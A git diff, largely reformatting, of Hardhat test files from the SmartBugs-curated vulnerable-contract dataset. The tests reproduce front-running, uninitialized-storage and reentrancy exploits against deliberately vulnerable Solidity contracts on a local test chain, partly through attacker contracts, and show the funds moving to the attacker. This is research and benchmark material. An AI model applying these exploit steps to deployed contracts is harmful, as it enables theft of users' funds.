--git a/smartbugs-curated/0.4.x/test/front_running/ERC20_test.js b/smartbugs-curated/0.4.x/test/front_running/ERC20_test.js index 3cf5ed2..ce47634 100644 --- a/smartbugs-curated/0.4.x/test/front_running/ERC20_test.js +++ b/smartbugs-curated/0.4.x/test/front_running/ERC20_test.js @@ -1,53 +1,65 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack front_running/ERC20.sol', function () { - let owner, attacker; - async function deployContracts() { - [owner, attacker] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/front_running/ERC20.sol/ERC20.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const ERC20 = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await ERC20.connect(owner).deploy(100); - return {victim}; - } +describe("attack front_running/ERC20.sol", function () { + let owner, attacker; + async function deployContracts() { + [owner, attacker] = await ethers.getSigners(); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/front_running/ERC20.sol/ERC20.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const ERC20 = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await ERC20.connect(owner).deploy(100); + return { victim }; + } - it('sanity check: front_running/ERC20.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.connect(owner).approve(attacker.address, 100)).to.not.be.reverted; - await expect(victim.connect(owner).approve(attacker.address, 10)).to.not.be.reverted; - await expect(victim.connect(attacker).transferFrom(owner.address, attacker.address, 10)).to.not.be.reverted; - }); + it("sanity check: front_running/ERC20.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.connect(owner).approve(attacker.address, 100)).to.not.be + .reverted; + await expect(victim.connect(owner).approve(attacker.address, 10)).to.not.be + .reverted; + await expect( + victim + .connect(attacker) + .transferFrom(owner.address, attacker.address, 10), + ).to.not.be.reverted; + }); - - it('front running vulnerability', async function () { - const {victim} = await loadFixture(deployContracts); + it("front running vulnerability", async function () { + const { victim } = await loadFixture(deployContracts); // owner mistakenly approves the attacker to spend 100 tokens - await victim.connect(owner).approve(attacker.address, 100); - const ownerInitialBalance = await victim.balanceOf(owner.address); - expect(ownerInitialBalance).to.be.equal(100); - - await network.provider.send("evm_setAutomine", [false]); - await network.provider.send("evm_setIntervalMining", [0]); - - // owner tries to rectify the allowance - const tx1 = await victim.connect(owner).approve(attacker.address, 10, {gasPrice: 767532034}); + await victim.connect(owner).approve(attacker.address, 100); + const ownerInitialBalance = await victim.balanceOf(owner.address); + expect(ownerInitialBalance).to.be.equal(100); - // attacker sees tx1's gasPrice and increases its tx gasPrice to become retrieve the tokens before tx1 is mined - const tx2 = await victim.connect(attacker).transferFrom(owner.address, attacker.address, 100, {gasPrice: 767532040}); + await network.provider.send("evm_setAutomine", [false]); + await network.provider.send("evm_setIntervalMining", [0]); - await network.provider.send("hardhat_mine", ["0x2"]); - await network.provider.send("evm_setAutomine", [true]); + // owner tries to rectify the allowance + const tx1 = await victim + .connect(owner) + .approve(attacker.address, 10, { gasPrice: 767532034 }); - const ownerBalance = await victim.balanceOf(owner.address); - expect(ownerBalance).to.be.equal(0); + // attacker sees tx1's gasPrice and increases its tx gasPrice to become retrieve the tokens before tx1 is mined + const tx2 = await victim + .connect(attacker) + .transferFrom(owner.address, attacker.address, 100, { + gasPrice: 767532040, + }); - const attackerBalance = await victim.balanceOf(attacker.address); - expect(attackerBalance).to.be.equal(100); - }); + await network.provider.send("hardhat_mine", ["0x2"]); + await network.provider.send("evm_setAutomine", [true]); + const ownerBalance = await victim.balanceOf(owner.address); + expect(ownerBalance).to.be.equal(0); - }); \ No newline at end of file + const attackerBalance = await victim.balanceOf(attacker.address); + expect(attackerBalance).to.be.equal(100); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/front_running/eth_tx_order_dependence_minimal_test.js b/smartbugs-curated/0.4.x/test/front_running/eth_tx_order_dependence_minimal_test.js index c59d0ae..f84c953 100644 --- a/smartbugs-curated/0.4.x/test/front_running/eth_tx_order_dependence_minimal_test.js +++ b/smartbugs-curated/0.4.x/test/front_running/eth_tx_order_dependence_minimal_test.js @@ -1,103 +1,120 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack front_running/eth_tx_order_dependence_minimal.sol', function () { - let owner, user , attacker; - async function deployContracts() { - [owner, user, attacker] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/front_running/eth_tx_order_dependence_minimal.sol/EthTxOrderDependenceMinimal.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const EthTxOrderDependenceMinimal = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await EthTxOrderDependenceMinimal.connect(owner).deploy(); - return {victim}; - } - - it('sanity check: front_running/eth_tx_order_dependence_minimal.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.connect(owner).setReward({value:2})).to.not.be.reverted; - await expect(victim.connect(owner).setReward({value:1})).to.not.be.reverted; - await expect(victim.connect(attacker).claimReward(1)).to.not.be.reverted; - }); - - - it('front running vulnerability in setReward() function', async function () { - const {victim} = await loadFixture(deployContracts); - - const attackerBalanceBefore = await ethers.provider.getBalance(attacker.address); - - expect(await victim.owner()).to.be.equal(owner.address); - - const initialBalance = await ethers.provider.getBalance(victim.target); - expect(initialBalance).to.be.equal(0); - - - await victim.connect(owner).setReward({value: 2}); - const balanceReward = await ethers.provider.getBalance(victim.target); - expect(balanceReward).to.be.equal(2); - - await network.provider.send("evm_setAutomine", [false]); - await network.provider.send("evm_setIntervalMining", [0]); - //owner wants to rectify the reward - const tx1 = await victim.connect(owner).setReward({value: 1, gasPrice: 767532034}); - - // attacker sees tx1 and wants to claim the reward before it's reset - const tx2 = await victim.connect(attacker).claimReward(1, {gasPrice: 767533000}); - - await network.provider.send("evm_mine"); - await network.provider.send("evm_setAutomine", [true]); - - // owner's tx1 will be reverted since the attacker's tx2 was mined first - expect(tx1).to.be.reverted; - const receipt2 = await (await tx2).wait(); - const gasUsed = receipt2.gasUsed * BigInt(767533000); - const balanceAfter = await ethers.provider.getBalance(victim.target); - expect(balanceAfter).to.be.equal(0); - - const attackerBalance = await ethers.provider.getBalance(attacker.address); - expect(attackerBalance).to.be.equal(attackerBalanceBefore + balanceReward - gasUsed); - }); - - - it('front running vulnerability in claimReward() function', async function () { - const {victim} = await loadFixture(deployContracts); - - const attackerBalanceBefore = await ethers.provider.getBalance(attacker.address); - - expect(await victim.owner()).to.be.equal(owner.address); - - const initialBalance = await ethers.provider.getBalance(victim.target); - expect(initialBalance).to.be.equal(0); - - - await victim.connect(owner).setReward({value: 2}); - const balanceReward = await ethers.provider.getBalance(victim.target); - expect(balanceReward).to.be.equal(2); - - await network.provider.send("evm_setAutomine", [false]); - await network.provider.send("evm_setIntervalMining", [0]); - //user knows that claimming reward with value 1 will be successfull - const tx1 = await victim.connect(user).claimReward(1, {gasPrice: 767532034}); - - // attacker sees tx1 with value 1 and wants to claim the reward before user - const tx2 = await victim.connect(attacker).claimReward(1, {gasPrice: 767533000}); - - await network.provider.send("evm_mine"); - - await network.provider.send("evm_setAutomine", [true]); - - // owner's tx1 will be reverted since the attacker's tx2 was mined first - expect(tx1).to.be.reverted; - const receipt2 = await (await tx2).wait(); - const gasUsed = receipt2.gasUsed * BigInt(767533000); - const balanceAfter = await ethers.provider.getBalance(victim.target); - expect(balanceAfter).to.be.equal(0); - - const attackerBalance = await ethers.provider.getBalance(attacker.address); - expect(attackerBalance).to.be.equal(attackerBalanceBefore + balanceReward - gasUsed); - - }); - - - }); \ No newline at end of file +describe("attack front_running/eth_tx_order_dependence_minimal.sol", function () { + let owner, user, attacker; + async function deployContracts() { + [owner, user, attacker] = await ethers.getSigners(); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/front_running/eth_tx_order_dependence_minimal.sol/EthTxOrderDependenceMinimal.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const EthTxOrderDependenceMinimal = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const victim = await EthTxOrderDependenceMinimal.connect(owner).deploy(); + return { victim }; + } + + it("sanity check: front_running/eth_tx_order_dependence_minimal.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.connect(owner).setReward({ value: 2 })).to.not.be + .reverted; + await expect(victim.connect(owner).setReward({ value: 1 })).to.not.be + .reverted; + await expect(victim.connect(attacker).claimReward(1)).to.not.be.reverted; + }); + + it("front running vulnerability in setReward() function", async function () { + const { victim } = await loadFixture(deployContracts); + + const attackerBalanceBefore = await ethers.provider.getBalance( + attacker.address, + ); + + expect(await victim.owner()).to.be.equal(owner.address); + + const initialBalance = await ethers.provider.getBalance(victim.target); + expect(initialBalance).to.be.equal(0); + + await victim.connect(owner).setReward({ value: 2 }); + const balanceReward = await ethers.provider.getBalance(victim.target); + expect(balanceReward).to.be.equal(2); + + await network.provider.send("evm_setAutomine", [false]); + await network.provider.send("evm_setIntervalMining", [0]); + //owner wants to rectify the reward + const tx1 = await victim + .connect(owner) + .setReward({ value: 1, gasPrice: 767532034 }); + + // attacker sees tx1 and wants to claim the reward before it's reset + const tx2 = await victim + .connect(attacker) + .claimReward(1, { gasPrice: 767533000 }); + + await network.provider.send("evm_mine"); + await network.provider.send("evm_setAutomine", [true]); + + // owner's tx1 will be reverted since the attacker's tx2 was mined first + expect(tx1).to.be.reverted; + const receipt2 = await (await tx2).wait(); + const gasUsed = receipt2.gasUsed * BigInt(767533000); + const balanceAfter = await ethers.provider.getBalance(victim.target); + expect(balanceAfter).to.be.equal(0); + + const attackerBalance = await ethers.provider.getBalance(attacker.address); + expect(attackerBalance).to.be.equal( + attackerBalanceBefore + balanceReward - gasUsed, + ); + }); + + it("front running vulnerability in claimReward() function", async function () { + const { victim } = await loadFixture(deployContracts); + + const attackerBalanceBefore = await ethers.provider.getBalance( + attacker.address, + ); + + expect(await victim.owner()).to.be.equal(owner.address); + + const initialBalance = await ethers.provider.getBalance(victim.target); + expect(initialBalance).to.be.equal(0); + + await victim.connect(owner).setReward({ value: 2 }); + const balanceReward = await ethers.provider.getBalance(victim.target); + expect(balanceReward).to.be.equal(2); + + await network.provider.send("evm_setAutomine", [false]); + await network.provider.send("evm_setIntervalMining", [0]); + //user knows that claimming reward with value 1 will be successfull + const tx1 = await victim + .connect(user) + .claimReward(1, { gasPrice: 767532034 }); + + // attacker sees tx1 with value 1 and wants to claim the reward before user + const tx2 = await victim + .connect(attacker) + .claimReward(1, { gasPrice: 767533000 }); + + await network.provider.send("evm_mine"); + + await network.provider.send("evm_setAutomine", [true]); + + // owner's tx1 will be reverted since the attacker's tx2 was mined first + expect(tx1).to.be.reverted; + const receipt2 = await (await tx2).wait(); + const gasUsed = receipt2.gasUsed * BigInt(767533000); + const balanceAfter = await ethers.provider.getBalance(victim.target); + expect(balanceAfter).to.be.equal(0); + + const attackerBalance = await ethers.provider.getBalance(attacker.address); + expect(attackerBalance).to.be.equal( + attackerBalanceBefore + balanceReward - gasUsed, + ); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/front_running/odds_and_evens_test.js b/smartbugs-curated/0.4.x/test/front_running/odds_and_evens_test.js index 4622dc3..b456b1e 100644 --- a/smartbugs-curated/0.4.x/test/front_running/odds_and_evens_test.js +++ b/smartbugs-curated/0.4.x/test/front_running/odds_and_evens_test.js @@ -1,59 +1,74 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack front_running/odds_and_evens.sol', function () { - let owner, user, attacker; - async function deployContracts() { - [owner, user, attacker] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/front_running/odds_and_evens.sol/OddsAndEvens.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const OddsAndEvens = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await OddsAndEvens.connect(owner).deploy(); - return {victim}; - } +describe("attack front_running/odds_and_evens.sol", function () { + let owner, user, attacker; + async function deployContracts() { + [owner, user, attacker] = await ethers.getSigners(); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/front_running/odds_and_evens.sol/OddsAndEvens.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const OddsAndEvens = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const victim = await OddsAndEvens.connect(owner).deploy(); + return { victim }; + } - it('sanity check: front_running/odds_and_evens.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.connect(user).play(0, {value: ethers.parseEther("1")})).to.not.be.reverted; - }); + it("sanity check: front_running/odds_and_evens.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect( + victim.connect(user).play(0, { value: ethers.parseEther("1") }), + ).to.not.be.reverted; + }); + it("front running vulnerability", async function () { + const { victim } = await loadFixture(deployContracts); - it('front running vulnerability', async function () { - const {victim} = await loadFixture(deployContracts); + const amount = ethers.parseEther("1"); - const amount = ethers.parseEther("1"); + const attackerBalanceBefore = await ethers.provider.getBalance( + attacker.address, + ); + const userBalanceBefore = await ethers.provider.getBalance(user.address); - const attackerBalanceBefore = await ethers.provider.getBalance(attacker.address); - const userBalanceBefore = await ethers.provider.getBalance(user.address); - - const initialBalance = await ethers.provider.getBalance(victim.target); - expect(initialBalance).to.be.equal(0); + const initialBalance = await ethers.provider.getBalance(victim.target); + expect(initialBalance).to.be.equal(0); - await network.provider.send("evm_setAutomine", [false]); - await network.provider.send("evm_setIntervalMining", [0]); - const tx1 = await victim.connect(user).play(0, {value: amount, gasPrice: 767532034}); + await network.provider.send("evm_setAutomine", [false]); + await network.provider.send("evm_setIntervalMining", [0]); + const tx1 = await victim + .connect(user) + .play(0, { value: amount, gasPrice: 767532034 }); - // attacker sees tx2 and sets the value and gasPrice to become the winner - const tx2 = await victim.connect(attacker).play(1, {value: amount, gasPrice: 767532033}); + // attacker sees tx2 and sets the value and gasPrice to become the winner + const tx2 = await victim + .connect(attacker) + .play(1, { value: amount, gasPrice: 767532033 }); - await network.provider.send("hardhat_mine", ["0x3"]); - await network.provider.send("evm_setAutomine", [true]); + await network.provider.send("hardhat_mine", ["0x3"]); + await network.provider.send("evm_setAutomine", [true]); - const receipt1 = await tx1.wait(); - const gasUsed1 = receipt1.gasUsed * receipt1.gasPrice; - const receipt2 = await tx2.wait(); - const gasUsed2 = receipt2.gasUsed * receipt2.gasPrice; - const balanceAfter = await ethers.provider.getBalance(victim.target); - expect(balanceAfter).to.be.equal(amount * BigInt(2) - ethers.parseEther("1.8")); + const receipt1 = await tx1.wait(); + const gasUsed1 = receipt1.gasUsed * receipt1.gasPrice; + const receipt2 = await tx2.wait(); + const gasUsed2 = receipt2.gasUsed * receipt2.gasPrice; + const balanceAfter = await ethers.provider.getBalance(victim.target); + expect(balanceAfter).to.be.equal( + amount * BigInt(2) - ethers.parseEther("1.8"), + ); - const userBalanceAfter = await ethers.provider.getBalance(user.address); - expect(userBalanceAfter).to.be.equal(userBalanceBefore - amount - gasUsed1); + const userBalanceAfter = await ethers.provider.getBalance(user.address); + expect(userBalanceAfter).to.be.equal(userBalanceBefore - amount - gasUsed1); - const attackerBalance = await ethers.provider.getBalance(attacker.address); - expect(attackerBalance).to.be.equal(attackerBalanceBefore - amount - gasUsed2 + ethers.parseEther("1.8")); - }); - - - }); \ No newline at end of file + const attackerBalance = await ethers.provider.getBalance(attacker.address); + expect(attackerBalance).to.be.equal( + attackerBalanceBefore - amount - gasUsed2 + ethers.parseEther("1.8"), + ); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/other/crypto_roulette_test.js b/smartbugs-curated/0.4.x/test/other/crypto_roulette_test.js index abdef21..516f870 100644 --- a/smartbugs-curated/0.4.x/test/other/crypto_roulette_test.js +++ b/smartbugs-curated/0.4.x/test/other/crypto_roulette_test.js @@ -1,52 +1,64 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack other/crypto_roulette.sol', function () { +describe("attack other/crypto_roulette.sol", function () { let owner; - async function deployContracts() { - [owner] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/other/crypto_roulette.sol/CryptoRoulette.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const CryptoRoulette = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await CryptoRoulette.deploy(); - await victim.connect(owner).waitForDeployment(); - return {victim}; - } - - it('sanity check: other/crypto_roulette.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.play(10, {value: ethers.parseEther("0.1")})).to.not.be.reverted; - }); + async function deployContracts() { + [owner] = await ethers.getSigners(); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/other/crypto_roulette.sol/CryptoRoulette.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const CryptoRoulette = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const victim = await CryptoRoulette.deploy(); + await victim.connect(owner).waitForDeployment(); + return { victim }; + } + + it("sanity check: other/crypto_roulette.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.play(10, { value: ethers.parseEther("0.1") })).to.not.be + .reverted; + }); + + it("exploit uninitialized storage vulnerability", async function () { + const { victim } = await loadFixture(deployContracts); + const amount = ethers.parseEther("1"); + await owner.sendTransaction({ to: victim.target, value: amount }); + + const contractBalance = await ethers.provider.getBalance(victim.target); - - it('exploit uninitialized storage vulnerability', async function () { - const {victim} = await loadFixture(deployContracts); - const amount = ethers.parseEther("1"); - await owner.sendTransaction({to: victim.target, value: amount}); - - const contractBalance = await ethers.provider.getBalance(victim.target); - - expect(contractBalance).to.be.equal(amount); - const attacker_addr = "0x000000000000000000000000000000000000000a"; - await network.provider.request({ - method: "hardhat_impersonateAccount", - params: [attacker_addr], - }); - const attacker_sign = await ethers.getSigner(attacker_addr); - - // attacker account needs ether to send its txs, it doesn't have to be from the owner - await owner.sendTransaction({to: attacker_addr, value: amount}); - const balanceBefore = await ethers.provider.getBalance(attacker_addr); - expect(balanceBefore).to.be.equal(amount); - - const tx = await victim.connect(attacker_sign).play(10, {value: ethers.parseEther("0.1")}); - const receipt = await tx.wait(); - const balanceAfter = await ethers.provider.getBalance(attacker_addr); - expect(balanceAfter).to.be.equal(amount - receipt.gasUsed * receipt.gasPrice + amount); - - const contractBalanceAfter = await ethers.provider.getBalance(victim.target); - expect(contractBalanceAfter).to.be.equal(0); + expect(contractBalance).to.be.equal(amount); + const attacker_addr = "0x000000000000000000000000000000000000000a"; + await network.provider.request({ + method: "hardhat_impersonateAccount", + params: [attacker_addr], }); - }); \ No newline at end of file + const attacker_sign = await ethers.getSigner(attacker_addr); + + // attacker account needs ether to send its txs, it doesn't have to be from the owner + await owner.sendTransaction({ to: attacker_addr, value: amount }); + const balanceBefore = await ethers.provider.getBalance(attacker_addr); + expect(balanceBefore).to.be.equal(amount); + + const tx = await victim + .connect(attacker_sign) + .play(10, { value: ethers.parseEther("0.1") }); + const receipt = await tx.wait(); + const balanceAfter = await ethers.provider.getBalance(attacker_addr); + expect(balanceAfter).to.be.equal( + amount - receipt.gasUsed * receipt.gasPrice + amount, + ); + + const contractBalanceAfter = await ethers.provider.getBalance( + victim.target, + ); + expect(contractBalanceAfter).to.be.equal(0); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/other/name_registrar_test.js b/smartbugs-curated/0.4.x/test/other/name_registrar_test.js index 750ba89..099d8bd 100644 --- a/smartbugs-curated/0.4.x/test/other/name_registrar_test.js +++ b/smartbugs-curated/0.4.x/test/other/name_registrar_test.js @@ -1,39 +1,46 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack other/name_registrar.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/other/name_registrar.sol/NameRegistrar.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const NameRegistrar = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await NameRegistrar.deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); +describe("attack other/name_registrar.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/other/name_registrar.sol/NameRegistrar.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const NameRegistrar = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const victim = await NameRegistrar.deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); - const NameRegistrarAttacker = await ethers.getContractFactory('contracts/other/name_registrar_attack.sol:NameRegistrarAttacker'); - const attacker = await NameRegistrarAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } + const NameRegistrarAttacker = await ethers.getContractFactory( + "contracts/other/name_registrar_attack.sol:NameRegistrarAttacker", + ); + const attacker = await NameRegistrarAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - it('sanity check: other/name_registrar.sol', async function () { - const {victim} = await loadFixture(deployContracts); - const unlocked = await victim.unlocked(); - expect(unlocked).to.be.false; - }); - - it('exploit uninitialized storage vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); + it("sanity check: other/name_registrar.sol", async function () { + const { victim } = await loadFixture(deployContracts); + const unlocked = await victim.unlocked(); + expect(unlocked).to.be.false; + }); - const unlocked = await victim.unlocked(); - expect(unlocked).to.be.false; + it("exploit uninitialized storage vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); - await attacker.attack(); + const unlocked = await victim.unlocked(); + expect(unlocked).to.be.false; - const unlockedAfter = await victim.unlocked(); - expect(unlockedAfter).to.be.true; - - }); - }); \ No newline at end of file + await attacker.attack(); + + const unlockedAfter = await victim.unlocked(); + expect(unlockedAfter).to.be.true; + }); +}); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f_test.js index b5d7cbe..f660203 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f_test.js @@ -12,14 +12,20 @@ describe("Reentrancy Attack for 0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f.sol", beforeEach(async function () { // Deploy LogFile contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f.sol/LogFile.json'); + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f.sol/LogFile.json", + ); const logJson = JSON.parse(fs.readFileSync(logPath)); Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); log = await Log.deploy(); await log.waitForDeployment(); // Deploy PersonalBank contract with LogFile address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f.sol/PERSONAL_BANK.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f.sol/PERSONAL_BANK.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); PersonalBank = await ethers.getContractFactory(json.abi, json.bytecode); victim = await PersonalBank.deploy(); @@ -27,14 +33,19 @@ describe("Reentrancy Attack for 0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f.sol", await victim.SetLogFile(log.target); // Set LogFile address after deployment // Deploy MaliciousContract with PersonalBank address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f_attack.sol:MaliciousContract"); + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f_attack.sol:MaliciousContract", + ); hacker = await MaliciousContract.deploy(victim.target); }); - it('sanity check: reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f.sol', async function () { - await expect(victim.Deposit({ value: ethers.parseEther('1') })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther('1')); - await expect(victim.Collect(ethers.parseEther('1'))).to.not.be.reverted; + it("sanity check: reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f.sol", async function () { + await expect(victim.Deposit({ value: ethers.parseEther("1") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("1"), + ); + await expect(victim.Collect(ethers.parseEther("1"))).to.not.be.reverted; expect(await ethers.provider.getBalance(victim.target)).to.equal(0); }); @@ -43,24 +54,24 @@ describe("Reentrancy Attack for 0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f.sol", await victim.Deposit({ value: ethers.parseEther("5") }); // verify correct deposit const initialBalance = await ethers.provider.getBalance(victim.target); - expect(initialBalance).to.equal(ethers.parseEther("5")); - + expect(initialBalance).to.equal(ethers.parseEther("5")); // Initial deposit from hacker on victim contract - await hacker.deposit({value: ethers.parseEther("2")}); + await hacker.deposit({ value: ethers.parseEther("2") }); - const privateBalanceAfterMaliciousDeposit = await ethers.provider.getBalance(victim.target); - expect(privateBalanceAfterMaliciousDeposit).to.equal(ethers.parseEther("7")); + const privateBalanceAfterMaliciousDeposit = + await ethers.provider.getBalance(victim.target); + expect(privateBalanceAfterMaliciousDeposit).to.equal( + ethers.parseEther("7"), + ); // we set the hackers balance to 0 - await network.provider.send("hardhat_setBalance", [ + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); + let hackerBalanceBeforeAttack = await ethers.provider.getBalance( hacker.target, - "0x0", - ]); - let hackerBalanceBeforeAttack = await ethers.provider.getBalance(hacker.target); + ); expect(hackerBalanceBeforeAttack).to.equal(0); - // Perform reentrancy attack through hacker await hacker.attack(ethers.parseEther("2")); @@ -69,14 +80,11 @@ describe("Reentrancy Attack for 0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f.sol", // Check balances after attack const personalBankBalance = await ethers.provider.getBalance(victim.target); const hackerBalance = await ethers.provider.getBalance(hacker.target); - + // victim has lost more than the 2 ethers from withdraw - expect(personalBankBalance).to.be.below(ethers.parseEther("5")); + expect(personalBankBalance).to.be.below(ethers.parseEther("5")); //hacker has more than the withdrawn amount expect(hackerBalance).to.be.above(ethers.parseEther("2")); - - }); - }); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4_test.js index 750627f..8511303 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4_test.js @@ -2,81 +2,88 @@ const { expect } = require("chai"); const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); -describe("Reentrancy Attack for 0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4.sol", function () { - let PrivateBank; - let victim; - let MaliciousContract; - let hacker; - let Log; - let log; +describe("Reentrancy Attack for 0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4.sol", function () { + let PrivateBank; + let victim; + let MaliciousContract; + let hacker; + let Log; + let log; - beforeEach(async function () { - // Deploy Log contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4.sol/Log.json'); - const logJson = JSON.parse(fs.readFileSync(logPath)); - Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); - log = await Log.deploy(); - await log.waitForDeployment(); + beforeEach(async function () { + // Deploy Log contract + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4.sol/Log.json", + ); + const logJson = JSON.parse(fs.readFileSync(logPath)); + Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); + log = await Log.deploy(); + await log.waitForDeployment(); - // Deploy PrivateBank contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4.sol/PrivateBank.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - PrivateBank = await ethers.getContractFactory(json.abi, json.bytecode); - victim = await PrivateBank.deploy(log.target); - await victim.waitForDeployment(); - //await victim.setLog(log.target); // Set Log address after deployment + // Deploy PrivateBank contract with Log address + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4.sol/PrivateBank.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + PrivateBank = await ethers.getContractFactory(json.abi, json.bytecode); + victim = await 